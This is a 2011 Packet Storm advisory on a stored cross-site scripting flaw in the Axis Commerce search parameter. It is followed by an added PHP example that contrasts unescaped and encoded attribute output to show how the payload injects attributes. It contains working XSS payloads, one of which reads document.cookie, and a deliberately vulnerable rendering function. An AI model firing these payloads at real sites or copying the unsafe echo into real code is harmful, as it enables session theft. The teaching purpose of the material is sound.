Axis Commerce 0.8.1 Cross Site Scripting

2011-08-19T00:00:00
ID PACKETSTORM:104245
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-19T00:00:00

Description

`# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS  
# Date: 19.08.2011  
# Author: Eyup CELIK  
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip  
# Version: 0.8.1 and previous  
# Tested on: Apache (For Windows)  
  
ISSUE  
  
Vulnerable Modules => Search Module  
  
XSS can be triggered through the command input  
  
Example Code: " onmouseover=prompt(XSS Code) bad="  
  
Example:  
  
http://localhost/axis-0.7.0.4/search/result?q=" onmouseover=prompt(906764) bad="  
  
http://localhost/axis-0.7.0.4/search/result?q=" onmouseover=prompt(document.cookie) bad="  
  
  
Thanks,  
  
  
Eyüp ÇELİK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`
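
The example value above starts with a double quote and ends with `bad="`, which is the shape needed to close a double-quoted HTML attribute and append new attributes to the same tag. The PHP below is an added example, not code from Axis Commerce or from the advisory's author: the function names and the `<input>` markup are assumptions about how a search page might echo `q`. It renders the value once unencoded and once encoded for the attribute context, then parses both results to list the attributes a browser would see on the tag.

```php
<?php
// Added example: hypothetical template helpers, not Axis Commerce source.

// Vulnerable pattern: the query is echoed into a double-quoted attribute as-is.
function render_search_box_unsafe(string $q): string
{
    return '<input type="text" name="q" value="' . $q . '">';
}

// Hardened pattern: encode for the HTML attribute context (both quote styles).
function render_search_box_safe(string $q): string
{
    $encoded = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="q" value="' . $encoded . '">';
}

// Parse the markup and return the attribute names found on the first <input>.
function input_attribute_names(string $html): array
{
    $previous = libxml_use_internal_errors(true); // silence fragment warnings
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    foreach ($input->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// The value of q taken from the advisory's first example URL.
$q = '" onmouseover=prompt(906764) bad="';

echo "unsafe: ", implode(', ', input_attribute_names(render_search_box_unsafe($q))), "\n";
echo "safe:   ", implode(', ', input_attribute_names(render_search_box_safe($q))), "\n";
```

Any attribute name in the first list beyond `type`, `name` and `value` came from the request parameter rather than from the template, which is the condition to test for when reviewing other places where `q` is echoed.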